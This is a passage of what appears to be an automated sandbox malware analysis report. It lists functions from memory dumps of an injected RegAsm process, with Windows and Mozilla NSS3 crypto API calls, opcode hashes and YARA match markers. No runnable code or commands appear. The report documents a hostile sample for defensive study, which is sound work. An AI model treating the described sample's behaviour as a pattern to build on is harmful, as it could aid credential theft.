                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                  • API String ID: 214693668-4289949731
                                                                                                                                                                                                                                                                  • Opcode ID: 71546864f35c6454175b9f3c75e117220484c34095eb5b797ca96b614d6560d5
                                                                                                                                                                                                                                                                  • Instruction ID: 5e1b1f21c9a17b45a8e0b3de6546786a39637799ffb93c4359a5db00ffc7c7ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71546864f35c6454175b9f3c75e117220484c34095eb5b797ca96b614d6560d5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D1190317002059FDB24DEA8D981A6AB3E9EF15704B50493EF853EB6C1C7B4E9488799
                                                                                                                                                                                                                                                                  Function 0040FC7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042653E), ref: 0040FC8D
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FC94
                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FCA0
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040FCCB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                  • String ID: >eB
                                                                                                                                                                                                                                                                  • API String ID: 1243822799-1374465750
                                                                                                                                                                                                                                                                  • Opcode ID: a5f7bcd971ff961b3dff2ec6cc91d00129f8b28e61a3b6feaf5a124593096c29
                                                                                                                                                                                                                                                                  • Instruction ID: eea17023b1511be057686bca1c183b4027cfc0da394c6b4b4e3fa5c11049d416
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5f7bcd971ff961b3dff2ec6cc91d00129f8b28e61a3b6feaf5a124593096c29
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0FEAA900128BBDB509BD99D09AFF76FDEF0DA02F041041FB41E5091E6788A94D7B4
                                                                                                                                                                                                                                                                  Function 6C8A9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8A9CF2
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8A9D45
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8A9D8B
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8A9DDE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: a8df98b92fe8bec7e59d51ea87da19e5c670dc0837da0758aae7d8f2b8976821
                                                                                                                                                                                                                                                                  • Instruction ID: e6570f32f8b284f1021599feb871cbb5d6a7ce34844fcb920083aff49806986c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8df98b92fe8bec7e59d51ea87da19e5c670dc0837da0758aae7d8f2b8976821
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27A1F134708702DBDB2D9FA5DA9877A37B1BB47315F08882CD5064BA40DB3AD847CB92
                                                                                                                                                                                                                                                                  Function 0041103C Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411041
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00411063
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C92: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411090,00000000,?,00000000,?), ref: 00410C9D
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C92: HeapAlloc.KERNEL32(00000000,?,00411090,00000000,?,00000000,?), ref: 00410CA4
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C92: wsprintfW.USER32 ref: 00410CB5
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 004110EA
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 004110F8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 004110FF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1628159694-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4685ca07d02a4720ff44245328d031b00118815223fea7385c58c5583d29c71c
                                                                                                                                                                                                                                                                  • Instruction ID: 18722114c2d27e3fbb326af6cdcadb769d84b464389158dcfe7cd7da56484696
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4685ca07d02a4720ff44245328d031b00118815223fea7385c58c5583d29c71c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3317C72901129AFDB21DBA1CC899EFBB7DFF0A750F10402AFA05E6151DB345A85CBE4
                                                                                                                                                                                                                                                                  Function 6C91AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000,00000000), ref: 6C91ADA7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000,00000000), ref: 6C91ADB4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,6C913FFF,?,?,?,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000), ref: 6C91ADD5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C968D2D,?,00000000,?), ref: 6C96FB85
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C96FBB1
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CA394B0,?,?,?,?,?,?,?,?,6C913FFF,00000000,?), ref: 6C91ADEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C913FFF), ref: 6C91AE3C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2a91d0e4a008d814da67ed1c9f4746067c1a225c2dfc581e2951420212d47a59
                                                                                                                                                                                                                                                                  • Instruction ID: 4c6eb5ca33f9c3df2153467910b49df661f80c3ace56703b5fc278dcfe51ee4f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a91d0e4a008d814da67ed1c9f4746067c1a225c2dfc581e2951420212d47a59
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD112671E042196BF7109A659C52BBF73BCDFB124CF048228EC5996A41FB20E95D82A2
                                                                                                                                                                                                                                                                  Function 6C93CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C951E10: TlsGetValue.KERNEL32 ref: 6C951E36
                                                                                                                                                                                                                                                                    • Part of subcall function 6C951E10: EnterCriticalSection.KERNEL32(?,?,?,6C92B1EE,2404110F,?,?), ref: 6C951E4B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C951E10: PR_Unlock.NSS3 ref: 6C951E76
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,6C93D079,00000000,00000001), ref: 6C93CDA5
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C93D079,00000000,00000001), ref: 6C93CDB6
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C93D079,00000000,00000001), ref: 6C93CDCF
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,6C93D079,00000000,00000001), ref: 6C93CDE2
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C93CDE9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1720798025-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0fe7e8ec8ebec99cfc5fe79e9d74db6fa1b85698bf860e5c040a2e97f6fdb970
                                                                                                                                                                                                                                                                  • Instruction ID: 64be9784fa042b721682d23f800b69b3d4d7c8b6839c7127ef096992e2ec53a3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fe7e8ec8ebec99cfc5fe79e9d74db6fa1b85698bf860e5c040a2e97f6fdb970
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D11A0B2B01636ABDF01AE66EC44AA6B76DFF1426D7104221F91D87E01E732E434C7E1
                                                                                                                                                                                                                                                                  Function 6C973D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C9738A2), ref: 6C973DB0
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C9738A2), ref: 6C973DBF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C9738A2), ref: 6C973DD9
                                                                                                                                                                                                                                                                  • _wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6C9738A2), ref: 6C973DE7
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6C9738A2), ref: 6C973DF8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1642359729-0
                                                                                                                                                                                                                                                                  • Opcode ID: 87be4cf38e035532c800a482aab887755173f8723ca8c3815960ed6803ba31df
                                                                                                                                                                                                                                                                  • Instruction ID: d34cc3f6d6fc062fc27a6638e5ffb60f747d570a98da4a6b896ad39bf61ea50d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87be4cf38e035532c800a482aab887755173f8723ca8c3815960ed6803ba31df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C401D6B57062233BFF2056765C49E3B3D6CEB41AACB240235FD29DA680EA51CC1181F1
                                                                                                                                                                                                                                                                  Function 6C9A2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9A5B56
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9A2CEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A2D02
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A2D1F
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A2D42
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A2D5B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                  • Instruction ID: 81d9c04def9023ed81daece0f990418b5cb9ac2da7536969a0685eccc10aa04c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 590108B5A10A00ABE7309E6AFC40BD7B3B5EF61318F014535E85D96711D632F816C792
                                                                                                                                                                                                                                                                  Function 6CA2BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BDC3
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BDCA
                                                                                                                                                                                                                                                                  • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BDE9
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BE21
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BE32
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3662805584-0
                                                                                                                                                                                                                                                                  • Opcode ID: 39a2819db0dfe39512fdb86e8b7d9fdaf8777297db9ceb703f0eb3461742d3ed
                                                                                                                                                                                                                                                                  • Instruction ID: c1b9dd2e53f11f40cc9dac5b22c4d905d8c89d5c6f4455cc52c47818b961a780
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39a2819db0dfe39512fdb86e8b7d9fdaf8777297db9ceb703f0eb3461742d3ed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC1107B9B01322CFDF0ADF29D80DB423BB5BB06245B088229D54A87310D3359C57CBB1
                                                                                                                                                                                                                                                                  Function 6CA27C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
